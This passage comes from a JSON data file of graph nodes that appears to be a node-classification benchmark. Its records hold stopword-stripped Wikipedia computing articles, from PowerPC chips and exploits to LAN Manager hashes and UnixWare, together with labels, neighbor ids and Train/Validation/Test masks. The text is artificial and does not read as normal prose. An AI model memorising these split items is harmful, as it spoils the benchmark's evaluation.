january power mac g5 june imac g5 august power mac introduced top clock speed 2.5 ghz liquid-cooled eventually reaching high 2.7 ghz april 2005 imac ran front side bus third clock speed despite intense user demand faster laptop cpu g4 apple never used g5 series cpu powerbook laptops original 970 used far much power never seriously viewed candidate portable computer 970fx reduced thermal design power tdp 30 w 1.5 ghz figure led many users believe powerbook g5 might possible however several obstacles prevented even 970fx used application 1.5 ghz g5 substantially faster 1.5 1.67 ghz g4 processors apple used powerbooks instead furthermore northbridge chips available interface 970fx memory devices designed portable computers consumed much power finally 970fx inadequate power saving features portable cpu minimum idle power much high would led poor battery life figures notebook computer ibm announced powerpc 970mp code-named antares 7 july 2005 power everywhere forum tokyo 970mp dual-core derivative 970fx clock speeds 1.2 2.5 ghz maximum power usage 75 w 1.8 ghz 100 w 2.0 ghz core 1 mb l2 cache twice 970fx like 970fx chip produced 90 nm process one cores idle enter doze state shut 970mp also includes partitioning virtualization features powerpc 970mp replaced powerpc 970fx apple high-end power mac g5 computers imac g5 legacy pci-x power mac g5 continued use powerpc 970fx processor powerpc 970mp used ibm js21 blade modules ibm intellistation power 185 workstation ydl powerstation due high power requirements ibm chosen discontinue parts running faster 2.0 ghz powerpc 970gx cancelled single-core version powerpc 970mp featured 1 mb l2 cache would available frequencies 1.2 3 ghz power dissipation would 16 w 1.6 ghz 85 w 3 ghz fabricated 90 nm fabrication process 970mp illustrations different generations 970 processors manufactured ibm east fishkill plant new york white ceramic substrate typical ibm high end processors era two dedicated northbridges powerpc 970-based computers manufactured ibm also cancelled cpc965 northbridge slated release 2007 uniprocessor-only northbridge features 533 mhz ddr2 controller supported 8 gb ecc memory 8x pcie bus integrated four-port gigabit ethernet ipv4 tcp/udp offloading usb 2.0 ports flash-interface northbridge contains integrated powerpc 405 core provide system management configuration capabilities ibm uses proprietary elastic interface bus modules",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      4881,
      11413,
      7065,
      1563,
      1820,
      1309,
      799,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      8231,
      11174,
      10924,
      4270,
      9391,
      10543,
      4017,
      5297,
      10675,
      1461,
      8120,
      11449,
      6715,
      9020,
      1725,
      1983,
      6207,
      1985,
      8899,
      10180,
      5448,
      336,
      8530,
      3540,
      342,
      9302,
      1115,
      5469,
      6878,
      11613,
      1635,
      8035,
      869,
      8931,
      10214,
      10985,
      1776,
      3185,
      4465,
      4211,
      5235,
      8058,
      3323,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3473,
    "label": 4,
    "text": "Exploit_(computer_security):exploit computer security exploit english verb exploit meaning use something one ’ advantage piece software chunk data sequence commands takes advantage bug vulnerability cause unintended unanticipated behavior occur computer software hardware something electronic usually computerized behavior frequently includes things like gaining control computer system allowing privilege escalation denial-of-service dos related ddos attack several methods classifying exploits common exploit communicates vulnerable software remote exploit works network exploits security vulnerability without prior access vulnerable system local exploit requires prior access vulnerable system usually increases privileges person running exploit past granted system administrator exploits client applications also exist usually consisting modified servers send exploit accessed client application exploits client applications may also require interaction user thus may used combination social engineering method another classification action vulnerable system unauthorized data access arbitrary code execution denial service examples many exploits designed provide superuser-level access computer system however also possible use several exploits first gain low-level access escalate privileges repeatedly one reaches highest administrative level often called root exploit made known authors affected software vulnerability often fixed patch exploit becomes unusable reason black hat hackers well military intelligence agencies hackers publish exploits keep private exploits unknown everyone people found developed referred zero day exploits exploitations commonly categorized named type vulnerability exploit see vulnerabilities list whether local/remote result running exploit e.g eop dos spoofing pivoting refers method used penetration testers uses compromised system attack systems network avoid restrictions firewall configurations may prohibit direct access machines example attacker compromises web server corporate network attacker use compromised web server attack systems network types attacks often called multi-layered attacks pivoting also known island hopping pivoting distinguished proxy pivoting vpn pivoting proxy pivoting generally describes practice channeling traffic compromised target using proxy payload machine launching attacks computer type pivoting restricted certain tcp udp ports supported proxy vpn pivoting enables attacker create encrypted layer tunnel compromised machine route network traffic target machine example run vulnerability scan internal network compromised machine effectively giving attacker full network access behind firewall typically proxy vpn applications enabling pivoting executed target computer payload software exploit pivoting usually done infiltrating part network infrastructure example vulnerable printer thermostat using scanner find devices connected attack attacking vulnerable piece networking attacker could infect network gain complete control",
    "neighbors": [
      5636,
      5637,
      10756,
      5131,
      5138,
      3092,
      2084,
      3620,
      7717,
      5682,
      5173,
      5176,
      7739,
      7228,
      1597,
      9791,
      4163,
      4689,
      6754,
      612,
      11365,
      2152,
      3178,
      107,
      2164,
      4725,
      4733,
      5245,
      5246,
      6269,
      642,
      138,
      9356,
      5261,
      5774,
      8333,
      11413,
      8344,
      10392,
      9375,
      3234,
      10915,
      2213,
      2732,
      10924,
      7855,
      1200,
      2739,
      700,
      3262,
      10950,
      711,
      7368,
      4813,
      5325,
      9424,
      2262,
      6360,
      3290,
      10971,
      4830,
      10466,
      2275,
      3299,
      6373,
      10987,
      10492,
      5373,
      6402,
      774,
      2825,
      9488,
      11537,
      8978,
      4374,
      5402,
      4892,
      5404,
      7965,
      8998,
      5927,
      8488,
      297,
      5934,
      3887,
      9518,
      11567,
      9525,
      823,
      2367,
      11584,
      3914,
      11594,
      6989,
      11086,
      6992,
      5970,
      4435,
      4948,
      1369,
      7515,
      4444,
      4956,
      4957,
      3423,
      3941,
      4453,
      7526,
      3944,
      2409,
      1393,
      3956,
      6520,
      4990,
      2430,
      9089,
      1922,
      899,
      9607,
      6033,
      10132,
      1429,
      2975,
      2470,
      11175,
      427,
      939,
      9646,
      5040,
      7601,
      7091,
      11191,
      6588,
      11198,
      8640,
      1474,
      11202,
      3525,
      9160,
      6606,
      4562,
      3539,
      9171,
      1494,
      9688,
      11225,
      988,
      7135,
      3552,
      9187,
      4582,
      8167,
      5608,
      11244,
      4081,
      5107,
      6643,
      1525,
      1017,
      4605,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3474,
    "label": 3,
    "text": "Bad_command_or_file_name:bad command file name bad command file name common confusing error message ms-dos operating systems command.com primary user interface ms-dos produces error message first word command could interpreted ms-dos word must name internal command executable file batch file error message provided accurate description problem easily confused novices though source error often mistyped command wording gave impression files named later words damaged illegal filenames later wording error message changed clarity windows nt displays following error message instead foo replaced word causing error early unix shells produced equally cryptic reasons modern shells produce error message similar",
    "neighbors": [
      2571,
      9166,
      6319,
      3856,
      5744,
      5520,
      7795,
      8852,
      8976,
      11442,
      11444,
      10333,
      1694,
      9919
    ],
    "mask": "Train"
  },
  {
    "node_id": 3475,
    "label": 9,
    "text": "Deforestation_(computer_science):deforestation computer science theory programming languages computer science deforestation also known fusion program transformation eliminate intermediate lists tree structures created immediately consumed program term deforestation originally coined philip wadler 1990 paper deforestation transforming programs eliminate trees deforestation typically applied programs functional programming languages particularly non-strict programming languages haskell one particular algorithm deforestation shortcut deforestation implemented glasgow haskell compiler deforestation closely related escape analysis",
    "neighbors": [
      8738,
      8262,
      4392,
      7273,
      7438,
      4980,
      10584,
      2620
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3476,
    "label": 4,
    "text": "Michael_Wertheimer:michael wertheimer michael wertheimer born february 6 1957 cryptologic mathematician october 31 2005 june 2009 assistant deputy director chief technology officer office director national intelligence analysis wertheimer oversaw coordination intelligence community efforts bring increased depth accuracy analysis technology 2008 wertheimer successfully launched a-space u.s. intelligence community facebook spies new social network opened september 2008 u.s. intelligence analysts covert operatives across 16 intelligence agencies share information continues advocate intelligence community reforms currently involved pressing adoption intellipedia classified wiki prior appointment wertheimer spent two years industry building research group focused intelligence community 1982 2003 cryptologic mathematician national security agency 1999 selected technical director data acquisition office nsa ’ signals intelligence directorate co-author 2001 signals intelligence strategy 2002 sigint architecture model wertheimer returned national security agency june 2009 june 2010 became current director research 2014 retired nsa works university maryland wertheimer received b.a degrees mathematics philosophy university rochester also received m.a ph.d. degrees mathematics university pennsylvania wertheimer married christina grot may 16 1993 two children daniel born may 13 1996 marissa born november 17 1993",
    "neighbors": [
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 3477,
    "label": 2,
    "text": "LAN_Manager:lan manager lan manager network operating system nos available multiple vendors developed microsoft cooperation 3com corporation designed succeed 3com 3+share network server software ran atop heavily modified version ms-dos lan manager based os/2 operating system co-developed ibm microsoft originally used server message block protocol atop either netbios frames protocol nbf specialized version xerox network systems xns protocol legacy protocols inherited previous products ms-net ms-dos xenix-net ms-xenix afore-mentioned 3+share version lan manager unix-based systems called lan manager/x also available 1990 microsoft announced lan manager 2.0 host improvements including support tcp/ip transport protocol last version lan manager 2.2 included ms-os/2 1.31 base operating system remained microsoft strategic server system release windows nt advanced server 1993 many vendors shipped licensed versions including lan manager authentication uses particularly weak method hashing user password known lm hash algorithm stemming mid 1980s floppy viruses major concern opposed potentially high-frequency attacks feedback high-bandwidth network makes hashes crackable matter seconds using rainbow tables hours using brute force use windows nt replaced ntlm older versions still vulnerable rainbow tables less vulnerable brute force attacks ntlm used logon local accounts except domain controllers since windows vista later versions longer maintain lm hash default kerberos used active directory environments major weaknesses lan manager authentication protocol lm hash also known lanman hash lan manager hash compromised password hashing function primary hash microsoft lan manager microsoft windows versions prior windows nt used store user passwords support legacy lan manager protocol continued later versions windows backward compatibility recommended microsoft turned administrators windows vista protocol disabled default continues used non-microsoft smb implementations lm hash computed follows although based des well-studied formerly secure block cipher lm hash true one-way function password determined hash several weaknesses design firstly passwords limited maximum 14 characters giving theoretical maximum keyspace formula_3 95 ascii printable characters secondly passwords longer 7 characters divided two pieces piece hashed separately weakness allows half password attacked separately exponentially lower cost whole formula_4 different 7-character password pieces possible character set mounting brute-force attack half separately modern desktop machines crack alphanumeric lm hashes hours addition lower case letters password changed upper case password hashed reduces key space half formula_5 lm hash also use cryptographic salt standard technique prevent pre-computed dictionary attacks time–memory tradeoff cryptanalysis attack rainbow table therefore feasible addition password shorter 8 characters result hashing 7 null bytes yielding constant value codice_5 hence making easy identify short passwords sight 2003 ophcrack implementation rainbow table technique published specifically targets weaknesses lm encryption includes pre-computed data sufficient crack virtually alphanumeric lm hashes seconds many cracking tools e.g rainbowcrack l0phtcrack cain incorporate similar attacks make cracking lm hashes fast trivial final weakness lm hashes lies implementation — since change user changes password used carry pass hash attack address security weaknesses inherent lm encryption authentication schemes microsoft introduced ntlmv1 protocol 1993 windows nt 3.1 hashing ntlm uses unicode support replacing codice_6 codice_7 require padding truncating would simplify key negative side des algorithm used 56-bit encryption subsequent authentication steps still salting furthermore windows machines many years configured default send accept responses derived lm hash ntlm hash use ntlm hash provided additional security weaker hash still present also took time artificial restrictions password length management tools user manager lifted lan manager considered obsolete current windows operating systems use stronger ntlmv2 kerberos authentication methods windows systems windows vista/windows server 2008 enabled lan manager hash default backward compatibility legacy lan manager windows earlier clients legacy netbios-enabled applications many years considered good security practice disable compromised lm ntlmv1 authentication protocols n't needed starting windows vista windows server 2008 microsoft disabled lm hash default feature enabled local accounts via security policy setting active directory accounts applying setting via domain group policy method used turn feature windows 2000 windows xp nt users also prevent lm hash generated password using password least fifteen characters length ntlm hashes turn become vulnerable recent years various attacks effectively make weak today lanman hashes back 1998 many legacy third party smb implementations taken considerable time add support stronger protocols microsoft created replace lm hashing open source communities supporting libraries first reverse engineer newer protocols—samba took 5 years add ntlmv2 support jcifs took 10 years poor patching regimes subsequent software releases supporting feature becoming available contributed organisations continuing use lm hashing environments even though protocol easily disabled active directory lastly prior release windows vista many unattended build processes still used dos boot disk instead windows pe start installation windows using winnt.exe something requires lm hashing enabled legacy lan manager networking stack work",
    "neighbors": [
      636,
      641,
      7426,
      6787,
      6916,
      7556,
      7557,
      7,
      5384,
      8576,
      6797,
      3984,
      3857,
      4242,
      4863,
      8976,
      1941,
      3477,
      10135,
      5406,
      2080,
      929,
      8098,
      2083,
      9635,
      4389,
      10273,
      2087,
      6954,
      7983,
      6321,
      3250,
      2357,
      4663,
      5433,
      570,
      10173,
      3007,
      5568,
      321,
      8513,
      4552,
      9033,
      10058,
      5067,
      2380,
      6476,
      9166,
      4305,
      6098,
      4051,
      9170,
      1501,
      6750,
      2143,
      5600,
      8670,
      2274,
      8674,
      8423,
      6888,
      9194,
      8301,
      8827,
      499,
      1012,
      11639,
      6905,
      3323,
      1148,
      639
    ],
    "mask": "None"
  },
  {
    "node_id": 3478,
    "label": 2,
    "text": "Jane_Silber:jane silber jane silber board member canonical ltd. chief executive officer 2010 2017 silber also chair board sensible code company whose products include quickcode silber joined canonical july 2004 work included leading ubuntu one project ensuring large organizations find ubuntu enterprise-ready partially attributes increasing attention user research design open source since 2009 canonical leadership area silber announced transition ceo role april 2017 canonical founder mark shuttleworth resuming position july 2017 silber earlier roles include vice president interactive television company vice president general dynamics c4 systems also worked japan teijin ltd conducting artificial intelligence research product development us general health health risk assessment firm holds mba degree oxford university saïd business school msc degree management technology vanderbilt university concentrated machine learning artificial intelligence work bsc degree mathematics computer science haverford college",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      11669,
      6808,
      7450,
      926,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      3245,
      6445,
      8112,
      1717,
      823,
      439,
      2109,
      11069,
      10687,
      3654,
      8263,
      10822,
      843,
      589,
      975,
      6352,
      4177,
      11602,
      1107,
      8787,
      4437,
      11643,
      4951,
      6489,
      3802,
      3550,
      4831,
      4192,
      9696,
      11232,
      11109,
      5990,
      7913,
      362,
      7020,
      7793,
      1394,
      2930,
      1396,
      2548,
      3189,
      8177,
      9971,
      5369,
      5755,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 3479,
    "label": 4,
    "text": "Eugene_Schultz:eugene schultz eugene schultz 1946 2011 american computer security researcher expert cybersecurity schultz born september 10 1946 chicago e. eugene sr. elizabeth schultz married cathy brown 36 years couple three daughters died stroke october 2 2011 completed bachelor degree ucla later earned ms phd cognitive sciences purdue university founder u.s. department energy computer incident advisory capability ciac managed several years chief technology officer emagined security authored several books papers computer security editor-in-chief computers security oldest journal computing security adjunct professor several universities winner department energy excellence award",
    "neighbors": [
      4194,
      307
    ],
    "mask": "Test"
  },
  {
    "node_id": 3480,
    "label": 4,
    "text": "Security_modes:security modes generally security modes refer information systems security modes operations used mandatory access control mac systems often systems contain information various levels security classification mode operation determined mode operation users must users access data system high mode operation users must users access data based need know mode operation users must users access data based need know formal access approval multilevel security mode operation also called controlled security mode users must users access data based need know clearance formal access approval",
    "neighbors": [
      1350,
      11496,
      4299,
      3440,
      2737,
      10580,
      6902,
      10968,
      5433,
      10170
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3481,
    "label": 9,
    "text": "LotusScript:lotusscript lotusscript object oriented programming language used lotus notes since version 4.0 ibm lotus software products lotusscript similar visual basic developers familiar one easily understand syntax structure code major differences two respective integrated development environments product-specific object classes provided language included vb includes richer set classes ui manipulation whereas lotusscript includes richer set application-specific classes lotus notes lotus word pro lotus 1-2-3 case lotus notes classes work notes databases documents records databases etc classes also used ole automation objects outside lotus notes environment visual basic lotusscript also allows definition user-defined types classes although possible inherit product-specific classes lotusscript programs access microsoft office documents using ole automation libraries ms office",
    "neighbors": [
      5633,
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      8473,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      10029,
      8494,
      303,
      7343,
      11315,
      9780,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      9828,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      3323,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 3482,
    "label": 4,
    "text": "Microsoft_Forefront_Threat_Management_Gateway:microsoft forefront threat management gateway microsoft forefront threat management gateway forefront tmg formerly known microsoft internet security acceleration server isa server network router firewall antivirus program vpn server web cache microsoft corporation runs windows server works inspecting network traffic passes microsoft forefront tmg offers set features include microsoft forefront threat management gateway product line originated microsoft proxy server developed code-name catapult microsoft proxy server v1.0 first launched january 1997 designed run windows nt 4.0 microsoft proxy server v1.0 basic product designed provide internet access clients lan environment via tcp/ip support also provided ipx/spx networks primarily used legacy novell netware environments winsock translation/tunnelling client allowed tcp/ip applications web browsers operate transparently without tcp/ip wire although well-integrated windows nt4 microsoft proxy server v1.0 basic functionality came one edition extended support microsoft proxy server v1.0 ended 31 march 2002 microsoft proxy server v2.0 launched december 1997 included better nt account integration improved packet filtering support support wider range network protocols microsoft proxy server v2.0 exited extended support phase reached end life 31 december 2004 18 march 2001 microsoft launched microsoft internet security acceleration server 2000 isa server 2000 isa server 2000 introduced standard enterprise editions enterprise-grade functionality high-availability clustering included standard edition isa server 2000 required windows 2000 edition also run windows server 2003 accordance microsoft support lifecycle policy isa server 2000 first isa server product use 10 year support lifecycle 5 years mainstream support five years extended support isa server 2000 reached end life 12 april 2011 microsoft internet security acceleration server 2004 isa server 2004 released 8 september 2004 isa server 2004 introduced multi-networking support integrated virtual private networking configuration extensible user authentication models application layer firewall support active directory integration securenat improved reporting management features rules based configuration also considerably simplified isa server 2000 version isa server 2004 enterprise edition included array support integrated network load balancing nlb cache array routing protocol carp one core capabilities isa server 2004 dubbed secure server publishing ability securely expose internal servers internet example organizations use isa server 2004 publish microsoft exchange server services outlook web access owa outlook mobile access oma activesync using forms-based authentication fba authentication type isa server used pre-authenticate web clients traffic unauthenticated clients published servers allowed isa server 2004 available two editions standard enterprise enterprise edition contains features enabling policies configured array level rather individual isa servers load-balancing across multiple isa servers edition isa server licensed per processor version included windows small business server 2000/2003 premium includes licensing 2 processors isa server 2004 runs windows server 2003 standard enterprise edition appliance hardware containing windows server 2003 appliance edition isa server standard edition available variety microsoft partners microsoft internet security acceleration server 2006 isa server 2006 released 17 october 2006 updated version isa server 2004 retains features isa server 2004 except message screener isa server 2006 introduced new features including isa server appliance edition microsoft also offered isa server 2006 appliance edition designed pre-installed onto oem hardware server appliances sold hardware manufacturers stand-alone firewall type device along appliance edition isa server 2006 standard edition enterprise edition available preconfigured hardware microsoft forefront threat management gateway medium business edition forefront tmg mbe next version isa server also included windows essential business server version runs 64-bit edition windows server 2008 support enterprise edition features array support enterprise policy mainstream support forefront tmg mbe ended november 12 2013 microsoft forefront threat management gateway 2010 forefront tmg 2010 released 17 november 2009 built foundation isa server 2006 provides enhanced web protection native 64-bit support support windows server 2008 windows server 2008 r2 malware protection bits caching service pack 1 product released 23 june 2010 includes several new features support windows server 2008 r2 sharepoint 2010 lines products service pack 2 product released 10 october 2011 9 september 2012 microsoft announced development take place forefront threat management gateway 2010 product longer available purchase 1 december 2012 mainstream support ceased 14 april 2015 extended support end 14 april 2020",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      5636,
      2309,
      1417,
      2443,
      6797,
      1172,
      9496,
      537,
      1436,
      4511,
      6431,
      929,
      10531,
      5924,
      550,
      5799,
      8998,
      5673,
      10790,
      3243,
      1708,
      3885,
      7983,
      7473,
      3250,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      10828,
      4814,
      9423,
      10574,
      6993,
      7121,
      10451,
      10708,
      4568,
      4953,
      5082,
      2907,
      6364,
      7515,
      9048,
      3935,
      9695,
      5860,
      3942,
      4074,
      10987,
      5356,
      8943,
      8816,
      11248,
      3827,
      9971,
      4725,
      5749,
      10872,
      1273,
      6651,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 3483,
    "label": 2,
    "text": "IPhone_XR:iphone xr iphone xr stylized marketed iphone roman numeral x pronounced ten smartphone designed manufactured apple inc twelfth generation iphone announced phil schiller september 12 2018 steve jobs theater apple park campus alongside higher-priced iphone xs iphone xs max pre-orders began october 19 2018 official release october 26 2018 phone 6.1-inch liquid retina lcd display apple claims advanced lcd industry least expensive device apple iphone x line devices starting price 749 united states 1029 canada £749 united kingdom €849 eurozone countries 6499 yuan china features processor xs xs max apple a12 bionic chip built 7 nanometer process apple claims smartest powerful chip ever put smartphone available six colors black white capri yellow coral shade pink orange product red xr available three storage capacities 64gb 128gb 256gb second iphone released yellow capri first iphone 5c 2013 internationally phone supports dual sims nano-sim esim mainland china hong kong macau dual nano-sim single tray offered instead despite receiving criticism lower display resolution comparison previous iphone models roughly price point xr received mostly positive reviews critics users release xr apple best selling 2018 model according apple xr battery lasts one-and-a-half hours longer direct predecessor iphone 8 xr similar design iphone x iphone xs however slightly larger bezels aluminum frame available wide variety colors similar x-branded iphones models come black front xr ip67 rating dust water resistance means immersed 1-meter deep water 30 minutes xr similar hardware xs features removed reduce price instead 3d touch xr comes haptic touch user long presses feel vibration taptic engine xr also lcd display known liquid retina instead oled screen used x xs xs max display xr resolution 1792×828 pixels pixel density 326 ppi compared 458 ppi x-branded iphones screen-to-body ratio xr 79.3 much higher 67.5 iphone 8 plus still lower phones price category unlike phones x-series xr ships single camera rear phone featuring exactly main camera sensor xs xs max utilizing 1/2.55 sensor size 1.4μm pixel size unlike xs optical zoom single camera dxomark gave camera iphone xr rating 101 giving title “ top-ranked single-lens phone. ” despite rear single-camera setup modified version portrait mode included works unaltered using truedepth front camera rear camera attempts calculate depth field using combination focus pixels image sensor ai resulting limitations including lower resolution depth data subjects close enough due wide-angle lens used instead missing telephoto lens like iphone xs xs max iphone xr also offers adjustable depth field software allowing user adjust background bokeh effect taking photo xr shipped ios 12 installed box compatible ios 13",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      1121,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      9863,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 3484,
    "label": 4,
    "text": "Sandboxie:sandboxie sandboxie sandbox-based isolation program developed sophos acquired invincea acquired earlier original author ronen tzur 32- 64-bit windows nt-based operating systems creates sandbox-like isolated operating environment applications run installed without permanently modifying local mapped drive isolated virtual environment allows controlled testing untrusted programs web surfing december 2013 invincea announced acquisition sandboxie original developer ronen tzur announced longer involved program february 2017 sophos announced acquisition invincea invincea posted assurance sandboxie website time sandboxie development support continue normal april 2019 official site shut preventing downloads installations purchases prompted creation temporary forum company domain may 2019 official site partially back purchase options regular forums still shut version 4.02 sandboxie full support 64-bit versions windows exception windows xp 64-bit never supported sandboxie released proprietary end-user license agreement eula home users may continue using sandboxie free without paying register however two functions remain disabled automatically running programs sandboxie simultaneous use multiple sandboxes 30 days sandboxie starts registration nagware message user dismiss 5-second delay sandboxie included brothersoft 2010 editors pick list gizmo freeware gave sandboxie rating 9 10 stars included editors choice list best free browser protection utility softonic given sandboxie rating 8 10 elena santos stating review sandboxie handy tool test untrustworthy software without putting system danger",
    "neighbors": [
      5411,
      5380,
      6438,
      5356,
      4972,
      10284,
      7983,
      8976,
      9488,
      8466,
      7380,
      925,
      4382,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 3485,
    "label": 4,
    "text": "Mitro:mitro mitro password manager individuals teams securely saved users logins allowed users log share access october 6 2015 mitro service shut successor mitro named passopolis password manager built upon mitro source code mitro founded 2012 vijay pandurangan evan jones adam hilss july 31 2014 mitro team announced would join twitter time released source code mitro github free software gpl mitro team announced shuttering mitro service following timeline mitro team explained reason shutting service cost administrative burden maintain service spare time money become much given could properly manage service people rely security needed stop running former customers encouraged move passopolis independent project uses open source mitro code use alternatives 1password dashlane lastpass october 5 2015 mitro officially terminated twitter mitro backed 1.2 million seed funding google ventures matrix partners mitro uses google keyczar server keyczar js implementation browser",
    "neighbors": [
      9922,
      713,
      10602,
      10059,
      5072,
      9168,
      11221,
      5078,
      7359
    ],
    "mask": "None"
  },
  {
    "node_id": 3486,
    "label": 4,
    "text": "Snort_(software):snort software snort free open source network intrusion detection system ids intrusion prevention system ips created 1998 martin roesch founder former cto sourcefire snort developed cisco purchased sourcefire 2013 2009 snort entered infoworld open source hall fame one greatest pieces open source software time snort open source network-based intrusion detection/prevention system ids/ips ability perform real-time traffic analysis packet logging internet protocol ip networks snort performs protocol analysis content searching matching program also used detect probes attacks including limited operating system fingerprinting attempts semantic url attacks buffer overflows server message block probes stealth port scans snort configured three main modes sniffer packet logger network intrusion detection sniffer mode program read network packets display console packet logger mode program log packets disk intrusion detection mode program monitor network traffic analyze rule set defined user program perform specific action based identified several third-party tools interfacing snort administration reporting performance log analysis",
    "neighbors": [
      3714,
      7813,
      2192,
      5139,
      4373,
      5245,
      3609,
      4762,
      6559,
      10788,
      7983,
      2045,
      6834,
      9146,
      10433,
      1474,
      2375,
      6345,
      8141,
      8399,
      8535,
      7385,
      4186,
      5472,
      9440,
      5612,
      7025,
      5874,
      7031,
      6013
    ],
    "mask": "Test"
  },
  {
    "node_id": 3487,
    "label": 2,
    "text": "UnixWare:unixware unixware unix operating system originally released univel jointly owned venture unix system laboratories usl novell taken novell via santa cruz operation sco went caldera systems caldera international sco group sold unxis xinuos unixware typically deployed server rather desktop binary distributions unixware available x86 architecture computers unixware primarily marketed server operating system svr4 effort merge sunos system v unix system laboratories usl formed univel partnership novell develop desktop version unix codenamed destiny destiny based unix system v release 4.2 kernel moolit toolkit used windowing system allowing user choose open look motif-like look feel run time order make system robust commodity desktop hardware veritas vxfs journaling file system used place ufs file system used svr4 networking support unixware included tcp/ip interoperability novell netware protocols ipx/spx former standard among unix users time development pc networking much commonly based netware destiny released 1992 unixware 1.0 intention unifying fragmented pc unix market behind single variant operating system system earlier reach corporate computing market microsoft windows nt observers period remarked unixware another flavor unix novell involvement marketing ploy significant influx technology os existed two editions personal edition included novell ipx networking tcp/ip advanced server edition tcp/ip server software personal edition limited two active users server edition included unlimited user license around 35,000 copies unixware 1.0 sold 1993 novell purchased usl merged usl univel new unix systems group 1994 novell released unixware 1.1 included tcp/ip personal advanced server editions motif 1.2 runtime libraries included cose compliance nuc netware unix client software included integration novell netware servers advanced merge application installed server personal editions allow running dos windows 3.1 applications novell later released bug-fix versions 1.1.1 1.1.2 1.1.3 finally 1.1.4 19 june 1995 unixware 2.0 based unix system v release 4.2mp kernel added support multiprocessing began shipping oems developers december 1994 consumer market march 1995 personal server editions supported two processor systems possibility buying extra processor upgrade licenses server edition supported multiprocessor systems included standard intel mp 1.1 smp machines corollary c-bus systems system supported netware odi network drivers effort increase number supported network interfaces new features release included posix threads library addition older ui threads library sco licensed unixware 1995 novell also announced project create supernos based netware 4.1 unixware 2.0 technologies future however never materialized instead netware 4.10 server linux offered caldera netware linux openlinux since 1998 novell open enterprise server finally came 2005 1995 santa cruz operation sco acquired unixware novell exact terms transaction disputed see sco vs novell courts subsequently determined novell retained ownership unix transfer made public sco announced would work towards merging unixware openserver svr3.2 based os first release unixware sco version 2.1 1996 release unixware 2.1 announced proposed unixware/openserver merger known project gemini available 1997 64-bit version unixware developed 1998 one controversial change adoption openserver like user licensing policy univel novell releases unixware allowed 2 users personal edition unlimited numbers users server edition unixware 2.1 server edition included license 5 users customers wanting users could buy 10 25 100 500 unlimited user license extensions sco released three updates unixware 2.1 unixware 2.1.1 released 1996 achieved unix 95 branding unixware 2.1.2 2.1.3 available 1998 largely bug fix releases 1998 compaq released package known integrity xc consisting single-system image cluster proliant servers version unixware 2.1 unixware nonstop clusters first results gemini project made available early 1998 unixware 7 sco named kernel version unix system v release 5 system largely based unixware 2.1 features driver compatibility openserver allowing use openserver network drivers system administration utilities openserver scoadmin replaced original unixware sysadm utility major new features unixware 7 included multi-path i/o large files file systems support large memory systems unixware 7 lacked xenix compatibility features ancestors licensing reasons avoid paying microsoft code included svr3.2 1999 sco released unixware 7.1 update increased number editions business 5-user department 25 user enterprise 50 user editions replaced earlier personal server editions webtop application tarantella inc. included 2000 sco released unixware 7.1.1 update simultaneously unixware nonstop clusters 7.1.1+ip single-system image cluster package released new package allowed commodity hardware used well proprietary compaq hardware supported earlier integrity xc product directly available sco 2 august 2000 santa cruz operation sco announced would sell server software services divisions well rights openserver unixware products caldera systems march 2001 caldera systems became caldera international cii sco purchase completed may 2001 remaining part santa cruz operation company tarantella division changed name tarantella inc. caldera international initial release unixware renamed openunix 8 release would unixware 7.1.2 caldera international renamed sco group august 2002 broadening product line include mobile products services later newly renamed sco group reverted previous unixware brand version release numbering releasing unixware 7.1.3 7.1.4 openunix releases made available openunix 8.1.2 ou812 never released sco group continued maintain unixware issues periodic 